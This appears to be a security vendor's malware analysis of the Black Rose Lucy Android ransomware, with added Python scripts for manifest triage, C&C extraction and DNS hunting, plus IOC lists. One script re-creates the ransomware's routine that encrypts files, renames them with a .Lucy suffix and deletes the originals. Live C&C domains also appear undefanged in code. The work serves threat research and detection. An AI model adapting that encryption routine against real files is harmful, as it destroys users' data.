Lucy’s Back: Ransomware Goes Mobile

April 28, 2020

Research by: Ohad Mana, Aviran Hazum, Bogdan Melnykov, Liav Kuperman

Overview

Ransomware attacks have been a part of the security landscape for a long time. We are familiar with infamous malware such as CryptoLocker, WannaCry and Ryuk, all of which have caused enormous damage to organizations and private assets globally. And while ransomware has just started to take its first steps in the mobile world, it’s evolving fast as malware developers and attackers apply the experience they have gained to create disruptive mobile ransomware attacks.

An example is the ‘Black Rose Lucy’ malware family, originally discovered in September 2018 by Check Point. Lucy is a Malware-as-a-Service (MaaS) botnet and dropper for Android devices. And now, nearly two years later, it is back with new ransomware capabilities that allow it to take control of victims’ devices to make various changes and install new malicious applications.

When downloaded, Lucy now encrypts files on the infected device and displays a ransom note in the browser window which claims to be an official message from the US FBI, accusing the victim of possessing pornographic content on their device. The message also states that, as well as locking the device, the user’s details have been uploaded to the FBI Cyber Crime Department’s Data Center, and it lists the legal offenses the user is accused of committing. The victim is then instructed to pay a US$500 “fine” – unusually, by providing their credit-card information rather than via the more common method of Bitcoin.

In this follow-up research, Check Point researchers have discovered more than 80 samples of this new, active Lucy variant in the wild, distributed mainly via social media links and instant-messaging apps.

At First Glance

Android only grants an application device-administrator privileges, or access to the accessibility API, through explicit manual action by the user: it either asks for consent in a pop-up window or requires the user to navigate through a series of system settings before such privileges are granted.

However, the Android accessibility service, which can read the screen and perform taps and other interactions on the user’s behalf, can be abused by malware to get around these restrictions. Accessibility services are normally used to help users automate and simplify repeated tasks. With Lucy, they are the Achilles’ heel in Android’s defensive armour.

Lucy uses a cunning method to slip inside the Android device and take down its defenses. It displays a message asking the user to enable “SVO” (Streaming Video Optimization). By tapping ‘OK’ and enabling the service, the user grants the malware permission to use the accessibility service. Now Lucy is ready to carry out its malicious plan to encrypt the data on the victim’s device.

Figure 1. The malware’s popup message tricks the victim into enabling the accessibility service.

Taking A Closer Look: Technical Analysis of the Lucy Ransomware

When we got a lead from a tweet by Tatyana Shishkova (@sh1shk0va), an Android malware researcher, stating that Black Rose Lucy is back, we sprang into action. We collected samples and started our research and analysis.

We found that the samples we acquired disguise themselves as a harmless-looking video player application, primarily leverage Android’s accessibility service to install their payload without any user interaction, and implement an interesting self-protection mechanism.

Initialization:

The malware starts by registering a receiver called “uyqtecppxr” for the BOOT_COMPLETED and QUICKBOOT_POWERON actions, so that it runs at boot and checks whether the device’s country code belongs to a former Soviet state.

Lucy then tries to trick the victim into enabling the Accessibility Service by initiating an Alert Dialog that asks the user to take action.

From MainActivity, the application starts the malicious service, which registers a BroadcastReceiver for the action.SCREEN_ON intent that in turn re-launches the service. The service acquires a WakeLock (via PowerManager), which keeps the device’s screen on, and a WifiLock (via WifiManager), which keeps the Wi-Fi on.
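The traits described so far (a boot-time receiver for persistence, a service that binds the accessibility API, and a wake lock) are all visible in an app’s manifest before it ever runs. The script below is an added example of static manifest triage for exactly those traits; it is not code from the Lucy samples or from Check Point. Real APKs carry a binary AndroidManifest.xml, so decode it first (for example with apktool or androguard) and pass the text to triage_manifest(). The sample manifest is constructed: the receiver name is the one named above, while the package name “com.example.videoplayer” and the service name “.SvoService” are made up for the example.

```python
"""Static manifest triage for boot persistence, accessibility binding and
wake-lock use. Added example; the manifest below is constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ATTR_NAME = f"{{{ANDROID_NS}}}name"
ATTR_PERMISSION = f"{{{ANDROID_NS}}}permission"

# Boot-time actions the malware's receiver listens for.
BOOT_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED",
    "android.intent.action.QUICKBOOT_POWERON",
}
# A service guarded by this permission is an accessibility service.
ACCESSIBILITY_BIND = "android.permission.BIND_ACCESSIBILITY_SERVICE"
# Permissions worth flagging in combination: wake lock, boot persistence, the 'Call' command.
WATCHED_PERMISSIONS = {
    "android.permission.WAKE_LOCK",
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.CALL_PHONE",
}

# Constructed manifest resembling the described behaviour (not from a real sample).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.videoplayer">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Video Player">
    <receiver android:name=".uyqtecppxr">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
      </intent-filter>
    </receiver>
    <service android:name=".SvoService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""


def triage_manifest(manifest_xml: str) -> dict:
    """Return the package name plus any boot receivers, accessibility services
    and watched permissions declared in a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    findings = {
        "package": root.get("package"),
        "boot_receivers": [],
        "accessibility_services": [],
        "permissions": [],
    }
    for perm in root.iter("uses-permission"):
        name = perm.get(ATTR_NAME)
        if name in WATCHED_PERMISSIONS:
            findings["permissions"].append(name)
    for receiver in root.iter("receiver"):
        actions = {a.get(ATTR_NAME) for a in receiver.iter("action")}
        if actions & BOOT_ACTIONS:
            findings["boot_receivers"].append(receiver.get(ATTR_NAME))
    for service in root.iter("service"):
        if service.get(ATTR_PERMISSION) == ACCESSIBILITY_BIND:
            findings["accessibility_services"].append(service.get(ATTR_NAME))
    return findings


def suspicion_score(findings: dict) -> int:
    """Crude heuristic: a 'video player' that survives reboot, binds the
    accessibility API and holds a wake lock matches the behaviour described."""
    score = 0
    if findings["boot_receivers"]:
        score += 1
    if findings["accessibility_services"]:
        score += 2
    if "android.permission.WAKE_LOCK" in findings["permissions"]:
        score += 1
    return score


if __name__ == "__main__":
    found = triage_manifest(SAMPLE_MANIFEST)
    print(found, "score:", suspicion_score(found))
```

The score is deliberately crude: plenty of legitimate apps hold WAKE_LOCK or restart on boot, so the signal is the combination, and in particular an accessibility service in an app whose stated purpose (a video player) gives it no reason to need one.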

Communication:

The malware carries 4 encrypted command and control (C&C) servers in its code. Unlike previous versions of the malware, each C&C is a domain rather than an IP address. Even if a server is taken down, the actor can simply point the domain at a new IP address, which makes the malware much harder to neutralize.

The C&C servers are held as one long string, a concatenation of all the C&Cs hardcoded in the malware’s code, followed by a block of unused data.

Figure 2. The concatenation of all C&C servers in the malware’s code followed by a bulk of unused data.

Figure 3. The malware’s C&C servers.

The malware rotates between the C&Cs, and each one is called through a different API endpoint with a different URI.

Figure 4. The malware shifts between C&C servers and URIs.
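Two things an analyst wants from the description above are a way to pull the C&C list out of that concatenated string and a way to hunt for the resulting domains in DNS telemetry. The script below is an added example that does both; it is not code from the Lucy samples or from Check Point. The page does not show how the malware slices the string or what the unused data looks like, so the example assumes the four domains sit back to back, each ending in its .in TLD, followed by padding that contains no “.in” substring. The C&C URIs and the DNS log lines are constructed for the example.

```python
"""Recover the C&C list from the concatenated string, model the rotation, and
match the domains against DNS logs. Added example; inputs are constructed."""
import itertools
import re

# Constructed stand-in for the hardcoded string: the four IOC domains from this
# report, back to back, followed by junk padding (no '.in' inside the padding).
CNC_BLOB = (
    "gapsoinasj.in" "q9120qwpsa.in" "ja0h12p14k.in" "jqeoq0r1hgf03ds.in"
    "9Z4Q1L0P7K3M2N8V5B6C1X9Z4Q1L0P7K3M2N8V5B6C1X"
)
DOMAIN_RE = re.compile(r"[a-z0-9]+\.in")  # all four IOC domains share the .in TLD


def extract_cnc_domains(blob: str) -> list:
    """Pull the domains out of the concatenated string, in order."""
    return DOMAIN_RE.findall(blob)


def defang(domain: str) -> str:
    """Render a domain safely for sharing, e.g. gapsoinasj[.]in."""
    return domain.replace(".", "[.]")


def rotation(domains, uris):
    """Pair each C&C with its own URI and cycle through them endlessly, as the
    text describes. The URIs are assumed; the page only says each differs."""
    return itertools.cycle(zip(domains, uris))


def next_endpoints(n: int, uris) -> list:
    """The first n (domain, uri) pairs the rotation would produce."""
    return list(itertools.islice(rotation(extract_cnc_domains(CNC_BLOB), uris), n))


# Constructed DNS log lines (not real telemetry).
SAMPLE_DNS_LOG = """\
2020-04-21T10:02:11Z client=10.0.0.12 query=gapsoinasj.in type=A
2020-04-21T10:02:12Z client=10.0.0.12 query=cdn.example.net type=A
2020-04-21T10:03:40Z client=10.0.0.31 query=JA0H12P14K.IN. type=A
2020-04-21T10:05:02Z client=10.0.0.12 query=q9120qwpsa.in.lookalike.example type=A
2020-04-21T10:06:15Z client=10.0.0.44 query=update.jqeoq0r1hgf03ds.in type=A
"""
LOG_RE = re.compile(r"client=(\S+) query=(\S+)")


def dns_hits(log_text: str, iocs) -> list:
    """Return (client, matched_ioc) for queries equal to an IOC domain or a
    subdomain of one. Suffix matching (not substring) avoids the false
    positive on the 'q9120qwpsa.in.lookalike.example' line."""
    iocs = [d.lower() for d in iocs]
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        client, qname = m.group(1), m.group(2).lower().rstrip(".")
        for ioc in iocs:
            if qname == ioc or qname.endswith("." + ioc):
                hits.append((client, ioc))
                break
    return hits


if __name__ == "__main__":
    domains = extract_cnc_domains(CNC_BLOB)
    print([defang(d) for d in domains])
    print(next_endpoints(6, ["/a", "/b", "/c", "/d"]))
    print(dns_hits(SAMPLE_DNS_LOG, domains))
```

Because the C&Cs are domains, blocking the IP addresses they resolve to today is not enough; the DNS-level match above (exact name or subdomain, case-folded, trailing dot stripped) is the durable control, and it keeps working after the actor re-points the domains.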

Command & Control:

The C&C server can send commands that the malware parses and executes on the victim’s device. The commands this malware recognizes are listed in the table and screenshot below:

Command      Description
Call         Initiates a phone call to a number received from the C&C server.
GetCrypt     Reads a string called “key” from the C&C response, then calls another service that tries to fetch an array of all the device’s directories.
Decrypt      Same as ‘GetCrypt’, but used for decryption.
GetCont      Shows a message that the previous payment was declined.
GetApp       Sends a list of all installed applications to the C&C server.
Delloc       Empties the variable used in the request to the C&C server (in the sample we investigated this variable was never assigned, so no actual functionality was observed).
DelKey       Empties all variables that contain encryption keys.
Deleted      The malware deletes itself from the device.
StartShell   Opens a remote shell on the device, with the commands passed as arguments.

Files Encryption/Decryption

The malware receives a string called ‘key’ in the response from the C&C server. This string is split into two segments by the delimiter //.

Next, a new service is called, which first tries to fetch an array of all the device’s directories. If that fails, it tries the /storage directory, and as a last resort it tries /sdcard.

Figure 5. The malware tries to fetch the victim’s device directories.

The encryption process begins by iterating over the files in the directory array it received at the previous stage.

Before encrypting the files, the malware performs a few checks, such as length and permissions, to make sure each file can be encrypted/decrypted. After writing, it also checks that the file was encrypted successfully.

One interesting action Lucy performs during the encryption process is initializing an AES KeyGenerator with the constant 0x100 (256 decimal, which is also the AES-256 key length in bits). This later turns out to be a false lead, as the result is never even stored in a variable.

We prefer to give the actor behind this malware the benefit of the doubt and assume this is a decoy, designed as bait for anyone trying to analyze the malware’s mechanism. However, we cannot rule out the possibility that it is simply a careless mistake.

Figure 6. Generating the false key.

The actual key passed to SecretKeySpec is composed of the first segment of the ‘key’ string received from the C&C in the first stage, joined with another string, called ‘Key’, that is fetched from SharedPreferences.

This key, together with the directory array and a Boolean variable that switches between encryption and decryption modes, is passed as a parameter to the encryption/decryption function.

Figure 7. The malware’s encryption/decryption function.

When the malware has finished encrypting the targeted files on the device and has verified that they were encrypted successfully, it displays a ransom note in the browser window.

The ransom note pretends to be an official message from the US Department of Justice Federal Bureau of Investigation (FBI) and accuses the victim of possessing pornographic content on their device. It claims that, as a result, all content on the device has been encrypted and locked.

In addition, the message states that the victim’s details have been uploaded to the FBI Cyber Crime Department’s Data Center, and it lists the legal offenses the victim is accused of committing.

Finally, the victim is instructed to pay a US$500 “fine”, and to do so by providing credit-card information rather than via the more common method of Bitcoin.

Figure 8. Lucy’s ransom note.

The encryption and decryption processes are very similar, differing only in minor details such as adding (encryption) or removing (decryption) the .Lucy extension at the end of the file name, and the value of the Boolean parameter passed to the function.

In both the encryption and the decryption processes, we see the role of every key component we encountered earlier.
The first segment of the C&C-supplied ‘key’ string, together with the ‘Key’ string fetched from SharedPreferences, makes up the key passed to SecretKeySpec for both encryption and decryption.
When the decryption process is complete, the malware logs that all of the files were decrypted successfully. It then changes the current command to “Delete” and proceeds to delete itself.
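To make the mechanism described in the ‘Files Encryption/Decryption’ section and recapped above concrete, the script below re-creates its control flow: the key assembled from the first //-segment of the C&C ‘key’ string plus the ‘Key’ value from SharedPreferences, the directory fallback order (directory array, then /storage, then /sdcard), the length and permission pre-checks, the Boolean encrypt/decrypt switch, the .Lucy suffix, the post-write verification, and the fact that the same function serves both directions. This is an added example and not the malware’s code or Check Point’s. The page names AES and SecretKeySpec but does not show the cipher mode or IV handling, so the cipher here is a clearly labelled stand-in (an HMAC-SHA256 counter keystream XORed over the file), SharedPreferences is a plain dict, the 50 MB size limit is an assumption, and the decoy KeyGenerator call is not reproduced. Running it on a real device would require the real key material, which is not on the page.

```python
"""Control-flow re-creation of the described encrypt/decrypt routine.
Added example; stand-in cipher, constructed inputs, runs in a temp dir."""
import hashlib
import hmac
import os
import tempfile

LUCY_SUFFIX = ".Lucy"
KEY_DELIMITER = "//"               # delimiter named on the page
MAX_FILE_SIZE = 50 * 1024 * 1024   # assumed threshold for the 'length' check


def assemble_key(cnc_key_field: str, shared_prefs: dict) -> bytes:
    """First '//'-segment of the C&C 'key' string + the 'Key' from SharedPreferences."""
    first_segment = cnc_key_field.split(KEY_DELIMITER, 1)[0]
    return (first_segment + shared_prefs["Key"]).encode()


def pick_directories(candidates, probe=os.path.isdir) -> list:
    """Fallback order from the page: the directory array, else /storage, else /sdcard."""
    usable = [d for d in candidates if probe(d)]
    if usable:
        return usable
    for fallback in ("/storage", "/sdcard"):
        if probe(fallback):
            return [fallback]
    return []


def _keystream(key: bytes, length: int) -> bytes:
    """Stand-in for AES (mode/IV not on the page): HMAC-SHA256 counter keystream."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def transform(data: bytes, key: bytes) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def eligible(path: str, encrypt: bool) -> bool:
    """Pre-checks the page mentions (length, permissions) plus whether the
    file is already in the target state (suffix present or absent)."""
    if not os.path.isfile(path):
        return False
    size = os.path.getsize(path)
    if size == 0 or size > MAX_FILE_SIZE:
        return False
    if not os.access(path, os.R_OK | os.W_OK):
        return False
    return path.endswith(LUCY_SUFFIX) != encrypt


def process_directories(dirs, key: bytes, encrypt: bool) -> list:
    """Walk the directories; `encrypt` is the Boolean mode switch.
    Returns the paths written (with .Lucy added or removed)."""
    written = []
    for root in dirs:
        for dirpath, _, names in os.walk(root):
            for name in names:
                src = os.path.join(dirpath, name)
                if not eligible(src, encrypt):
                    continue
                with open(src, "rb") as fh:
                    out = transform(fh.read(), key)
                dst = src + LUCY_SUFFIX if encrypt else src[:-len(LUCY_SUFFIX)]
                with open(dst, "wb") as fh:
                    fh.write(out)
                with open(dst, "rb") as fh:      # verify the write, as the malware does
                    if fh.read() != out:
                        continue
                os.remove(src)
                written.append(dst)
    return written


def demo():
    """Constructed run in a temp dir: encrypt, then decrypt; report both passes."""
    prefs = {"Key": "prefs-part"}                                  # constructed SharedPreferences
    key = assemble_key("cnc-part//unused-second-segment", prefs)  # constructed C&C 'key'
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "DCIM"))
        samples = {"notes.txt": b"hello", os.path.join("DCIM", "img.jpg"): b"\xff\xd8\xff" * 8}
        for rel, data in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        open(os.path.join(root, "empty.bin"), "wb").close()       # zero length: skipped by checks
        dirs = pick_directories([root, "/no/such/dir"])
        encrypted = sorted(os.path.basename(p) for p in process_directories(dirs, key, True))
        restored = {}
        for p in process_directories(dirs, key, False):
            with open(p, "rb") as fh:
                restored[os.path.basename(p)] = fh.read()
        return encrypted, restored
```

The point for a responder is the structure, not the cipher: the working key is never stored whole on the device (half comes from the C&C response, half from SharedPreferences), the Boolean switch means one code path handles both directions, and the verify-then-delete step is why the original file is gone once the .Lucy copy exists. Where the zero-length file is skipped above, a real sample may use different thresholds.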

Summary:

Although we have not yet seen much mobile ransomware in the wild, we have observed an evolution. Mobile ransomware is getting more sophisticated and efficient, as Lucy shows, and this represents an important milestone in the evolution of mobile malware. Sooner or later, the mobile world will experience a major destructive ransomware attack.

Stay Protected from Mobile Threats

Check Point SandBlast Mobile is a Mobile Threat Defense (MTD) solution, providing a wide range of capabilities to help you secure your mobile workforce. SandBlast Mobile provides protection for all mobile attack vectors, including the download of malicious applications and of applications with malware embedded in them.

IOCs:

  • C&C Servers:

gapsoinasj[.]in
q9120qwpsa[.]in
ja0h12p14k[.]in
jqeoq0r1hgf03ds[.]in

Package name                      Hash (SHA-256)
co1m.andr53oid.gohpat a4224502518b48bc02fe569055dd9cdb5c06b8355625482affcfab15911b9111
co1m.andr53oid.gohpat 1604634cf52ca567c4121d6f11ba1a5166961da65e18098685c404d1eca36002
co1m.andr53oid.gohpat 0b213d7deb41b262638adcfce47048e61f949749f688e6440c4951646710f8b3
co1m.andr53oid.gohpat a6dcd24d400f2b1a3c14da08cb5655f4ac16053adbad0550c338d35175fa51f6
co1m.andr53oid.gohpat b7d3b1129798f0a16b3cb9e63d1cb0f202d820e2649f3af479a831e7ff8cc0bf
co1m.andr53oid.gohpat 4c8f0810c0071d199af5b1ab1a332a239a536ab96152abf5445bdee11e77e87d
co1m.andr53oid.gohpat af18bb67d0b465d83409dd27610d3de7aa22548cc7f1a2f6499c5bb6cea88a4c
co1m.andr53oid.gohpat 1163d9d45b57fa267044bede0ca3493c1bae3e604f632f348f28107566036fcf
co1m.andr53oid.gohpat 5c6f4b0ffcb31f4d10c9c1e95f298f8cf8b3a1a97a2272e540fed0cca4829bbf
co1m.andr53oid.gohpat 4c6c04fc22e19dc5d1de7237da6f0d3cdddfeb655be957b6e592ef91c74fd71c
co1m.andr53oid.gohpat 9f4c7e8f7765fb4e878d3f4f0cb424c4bb0802db10e407c98c7c50e181d3e334
co1m.andr53oid.gohpat 932226edcc0b7308ef919eb8e6fb2966057215d4b18881ac6eaf7624513838a6
dtlrquunob.ntrbhppvnr.dbawnbxoxz dac40ca71dab0a40ed4d7de64b463f7b91ecd473a279451788369087edfff8d0
gcoojdprtw.tsqrstjtdi.crwrnqoqur 05bbe4182b890c91ff96ef7bf39e5dd94feae83d5067ccdc9703a05278b9983d
tpviytfsqr.kbnsbdnudm.tswponqgfg 70fef3fd8100b8ede14b4cb37cc2b2c6baa208920bd345439a2a19c1d47a1618
uuctvbgtlb.nkoqrtdctt.unootbawgh 8f0befb9381f9b0b1253a07487456b585a2352bdbdd0e3cc2e17b29b489a8376
wcqrucdpzh.otstodvvsm.vrbnjqrsrr f1dd83ae85d1c91e09643657e19242f90a39a238d28cd3ece9b91379c768e471
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c18c5ca32b80d4b595500853e1899d03edbe954d1e79da14f167aa888918d547
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 7890332435bfebef9a5f7d9cac07e550cdbe67b071d879aa271dba3419c58a42
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 8b7951961ebe92348e4d498ca99fd8de4087a4503cead784bd1dcd538084d1bd
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 02cfbe349d6e9c57286121ee727260f7effba00e765053ad38ca03bd44936a57
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 953b844c859fdf39a9409e39c78296a4612f6d4e8dc4b4ed1576a3c646640fb2
wcqrucdpzh.otstodvvsm.vrbnjqrsrr ad47c461c9b5b622f811abd9f8b3184682755d71c3f0fadea0bc74e0ff235d9f
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 2ee564b1f97546342ebeff6e763702b65de61f8889203ccb95d41b3e80168269
wcqrucdpzh.otstodvvsm.vrbnjqrsrr cb189527d786306c92cf8aba253c7f606aa93d24fc87152991c30f0a5598b42a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 7cdda437613cf8a20482f2abb43cedafca2220384eda590caf23eb119730f482
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 9510c6e4915348a6336feaa0af9fa1c87b8b19a2df2a991f6afa76b5eeeb61df
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 71e6710ea1acbf0525992c3785dab6928311ca42a8391c3c06a299b8d9d1fa71
wcqrucdpzh.otstodvvsm.vrbnjqrsrr a2bd3ed53c78b4e9daf8b1d732464423ef8bc7e7f8efc78188107632d8dbf749
wcqrucdpzh.otstodvvsm.vrbnjqrsrr bd044e9967b333314bb264266790f2b5bbeb5436016948cef0aea9e1a6cb9b9a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 72c84191fe66c690f5101cf307293c003f82d80f1d00ee010e3067bb0c668d75
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3ad1aa75f699be78c20a2aa7ab94f30186896d7adee10617b02448fa5e5c08fe
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 93e424910745124e992b4eb698fbeb297c023c89c006263eeebb13806179e2b6
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c2a874ff310632bce3f5b64d426f296b74c5c8d7e1cd8bffa3875987ee7cd0f8
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 283892cbf8ff13ddf499835185d54bb2fa4c86864eaecf5de231c67f6d14da82
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 963a672c540f16fea31f7a73a5cbf89e8571afaf56f104c08f30e7b8faaa1cee
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 57d9420ac144d2a62fddb4959a405de1243bc75f7b579abb4489c1ea16320b35
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d8b5ce2a2146707cea7258ff580578f567e6ce6350cbd1c0e63f5ca1988db7ea
wcqrucdpzh.otstodvvsm.vrbnjqrsrr df8f717de4f93b2abd99630784ed402c5b5781bb09493c1a7daeb3ae6d565afd
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 0a5a317859cc0cb52fbf80cb8fce9916cc113193fb56231711cc83a44601ba91
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3688e2fd329263b77000533f2263ab823755165ac32c12e8087096caac6634e7
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c1e4ff0d28523364749e8be8db07eb0157f159a28bece0f6c386258c70a24a9d
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 72fa9bfc1c5be8e24fa152287ef6124b05d88cee15b9bb16729c647bf13a78bb
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 2e5c0b796c4830f11066e8c78fb215ac0a1bb555ca0d89973c7c40a046b99d0c
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 8437688a49a03e80c3d53a28f533d6e92b6c299f1c9c67305034b78e71e95d24
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3afb57ed431dd88bcf82203fa4f19c9164eae672768f87153334813bae91fee1
wcqrucdpzh.otstodvvsm.vrbnjqrsrr f1e0d9b230c64e95dc3a57e463947d5044b82a15e0aa975df209c9ad849c19c8
wcqrucdpzh.otstodvvsm.vrbnjqrsrr b87eee136d69a73a130d5f935758ff87f6913445f1c6321f89cef7450272ce9f
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 5604a3fde8dd61691313e6812f13143d093d58b8047f07489f5d2b0e5490b6bf
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 99f412e6e69bc3f1354024003310f31655159e2d46e3e896aeee5ab8b4612c9a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr a3e6eee97a50b2156e1ee24f0c02996e36f478ca5f8904e4f403e7c29195dd55
wcqrucdpzh.otstodvvsm.vrbnjqrsrr ad04c15e3488cb7642298d211ef84d99fcb8991039caf1ae70ff5a3982690a97
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 7a4b8aa0981b010b7a92400a4d8690d29719fe42807495338c6192b8c6eb1286
wcqrucdpzh.otstodvvsm.vrbnjqrsrr baecc174fc1c12ac228fc914935cbdce7111a9ebe27e1c78489d190ec6f66f50
wcqrucdpzh.otstodvvsm.vrbnjqrsrr c6e27280f6f7d3199bff21018fb1fa6f9338b81f3572b010ab5467fe54649a19
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 67d99c5f4233ae02b21d8cb6e72203372ae3b7a2a12bbe2bf419a70aee1a0984
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 5c2333a7a5fcc71ec16d02a48134981cfe7ecfc2ddb8114ef46c57af0eccd4ef
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 8e8bf651aaa5e29dc13029c167ad8bdf156b78c138db470cfbabeb0a1168cdab
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 994bafbc78124960397ad0eaea6e00536ebc59c485459196bcc02b0cffa734a7
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 6b0ddf78efc98c1fe34ac7500be38254ee57cc4d436a51b5943c8851e4d46128
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d97ad77c670822682c89ddd86b32dd6be0aef67a8c27161b389de6799089c7a3
wcqrucdpzh.otstodvvsm.vrbnjqrsrr b4cf0ef34f8c52d713f1755ff8f8e8ef01987ba95179b3d6f72229652a9ce95a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr ff43b8da4337de1f0242da64c84c6fa0d2e3521546a2b8fc44d635fd18130c10
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3144526d354e29e5cc3985a8f06513627b98441d6db745b96fe85e78bf17b066
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 5bbe9e80288991de75fb7d4f1b2ea3a87cfcbd2a64a3e2b13861535cccecd136
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 67a592cb8ba37d1340bb8bbda13397c827e07b71066ec86eb709324652b8771c
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d2c0ced8bbd2a30c2ec726065d5bf0e124a5949418eb19fc8b94a5541695c1b9
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 20acb6c9de4eb8764a7d91034c4065adb0b9e5f7afb8183ff9abc1d09bff20fd
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 436f08e1fe0fc9d666f61b9e6a4f50311f867d3c878876b93e3cfebf88bf5362
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d9f510ee26cc33207e6f57340a711ac1f1f53afa5025f2ac34bbd2c012c98229
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 73210898f15b4b340fee4f0d4cbbbeb4ae1dae652629208d6a42bfdd1af08ad5
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 737b2e57ffcae73cf5825b4041c508f160a614a45c9eef644e79eb772101a7f3
wcqrucdpzh.otstodvvsm.vrbnjqrsrr cc38a5d43f305c5c1d7009de73d594dc7fe018b46f37fe1674e287ae254f4dde
wcqrucdpzh.otstodvvsm.vrbnjqrsrr e9fa1f21781337fd39988b0037356ff5983fe0a1bd2e5bb9ae839756168d0e6e
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d145b2ddc88b415d5c5646b8dd2c81bca212dae409a3f4431bcb3982c32c0762
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d9f82a7419a62ca19bee11aa3e935a42b3a45653ccb04f1ba1de9c222fae9ea0
wcqrucdpzh.otstodvvsm.vrbnjqrsrr db8913102a2f683f40f31fbb3063dbe67a382f6f4d61f4b52bb8a7cba2d14f29
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 3ea8579928b7f671e7df8637a7bd9b5d4fbf4e1b7bdeea2cc3c62b23ea0e9b96
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 2257eaa9788d8f0ae55a2d85794a3db82155a4586a29abab93c9ef61ab9bcb01
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 0ac1a48c7b3d17afb258be9f0fcb03720129d9939f7fbac741dbb6042012045a
wcqrucdpzh.otstodvvsm.vrbnjqrsrr 36b4ad5ece2a6fbcdf011ac08dd48f584a96cab09d4e3e0542b5b9b46a318244
wcqrucdpzh.otstodvvsm.vrbnjqrsrr d9866310eab9463f54703bb5c105c09b272205b0904ea9bd7f1ed2947022abcb